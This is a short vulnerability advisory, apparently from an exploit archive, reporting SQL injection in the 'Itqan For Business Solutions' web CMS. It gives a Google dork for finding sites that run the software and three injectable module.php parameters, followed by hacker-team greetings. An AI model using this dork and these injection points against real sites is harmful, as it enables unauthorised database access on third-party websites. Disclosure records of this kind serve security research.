Itqan For Business Solutions - SQL Injection Vulnerability

2016.05.25
Credit: 1337r00t
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:module.php "Designed & Developed by itQan for Web Design"

########################## # Exploit Title: Itqan For Business Solutions - SQL Injection Vulnerability # Google Dork: inurl:module.php "Designed & Developed by itQan for Web Design" # We Are Hackers Saudi Arabia # Home: http://www.negingroup.com/ # Discovered By: 1337r00t # Tested on : FireFox , Sqlmap ########################## # TEAM X6X.NET # T34m D4rkn3ss R00m ########################## # Poc :- SQL Injection |[+]----------------------------------------------------------[+]| # [$site]/module.php?m=projects&catid=[SQL] # [$site]/module.php?m=pages&pid=[SQL] # [$site]/module.php?m=newsdisplay&id=[SQL] |[+]----------------------------------------------------------[+]| ########################## ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |[+] G2 my Team :- |[+] Members: T34m D4rkn3ss R00m:- |[+] 1- Nine9 |[+] 2- [C]oder Girl: Safaa Hacker |[+] 3- xIL3zr |[+] 4- FreeDom |[+] 5- MjHoL HackEr |[+] 6- Hurabii HaCkEr |[+] 7- BL4ck M4n |[+] 8- SmoOoKr HaCkEr |[+]-------------------------------------------[+] |[+] G2 Friends : Killer~X - SraB HaCkEr -3NeeDaN HacKeR - Saudi HeX - 1337kSa - All My Friends |[+] ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |[+] Twitter : 1337r00t |[+] Instagram : 1337r00t ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top